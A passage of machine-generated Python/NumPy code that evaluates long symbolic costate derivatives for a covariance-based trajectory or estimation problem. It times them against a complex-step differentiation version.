- yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
(tf)*(-lamP11_N*(-p11_n*p11_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p12_n*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p11_s*p12_n*p12_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p11_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s),
(tf)*(-lamP11_N*(-p11_n*p11_s*p12_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(-p12_n*p12_s**2*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(-p12_n*p12_s**2*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p22_n*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p12_s*p13_n*p13_s*(x_n*x_s - xb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*p23_n*p23_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s),
(tf)*(2*lamP11_N*p13_s*v*sin(theta_n*theta_s)/p11_s - lamP12_N*(-p13_s*v*sin(theta_n*theta_s) + p13_s*v*cos(theta_n*theta_s))/p12_s - lamP22_N*p13_s*v*cos(theta_n*theta_s)/p22_s - lamP33_N*(-p13_n*p13_s*(x_n*x_s - xb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s + lamP13_N*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p23_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*(-p12_n*p12_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s**2*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(-p13_n*p13_s*p22_s*(x_n*x_s - xb)*(y_n*y_s - yb)/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*p23_n*p23_s*(y_n*y_s - yb)**2/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP12_N*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p12_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(-lamP22_N*p23_s*v*cos(theta_n*theta_s)/p22_s + lamP13_N*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p13_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP23_N*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + lamP33_N*p23_s*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*p33_s*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))),
(tf)*(lamP13_N*p33_s*v*sin(theta_n*theta_s)/p13_s - lamP23_N*p33_s*v*cos(theta_n*theta_s)/p23_s),
tf*0,
])
tock = toc()
print(fx)
print('A:' + str(tock))
tic()
for i in range(1000):
gx = np.array([
(tf)*(-np.imag(-lamP11_N*p11_n**2*p11_s*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n**2*p11_s*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p11_n**2*p11_s*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_n**2*p12_s**2*y_n**2*y_s**2/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n**2*p12_s**2*y_n*y_s*yb/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_n**2*p12_s**2*yb**2/(Dt*p11_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_n*p11_s*p12_n*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*y_n*y_s/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*yb/(Dt*p12_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n**2*p12_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_n**2*p12_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_n**2*p12_s*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 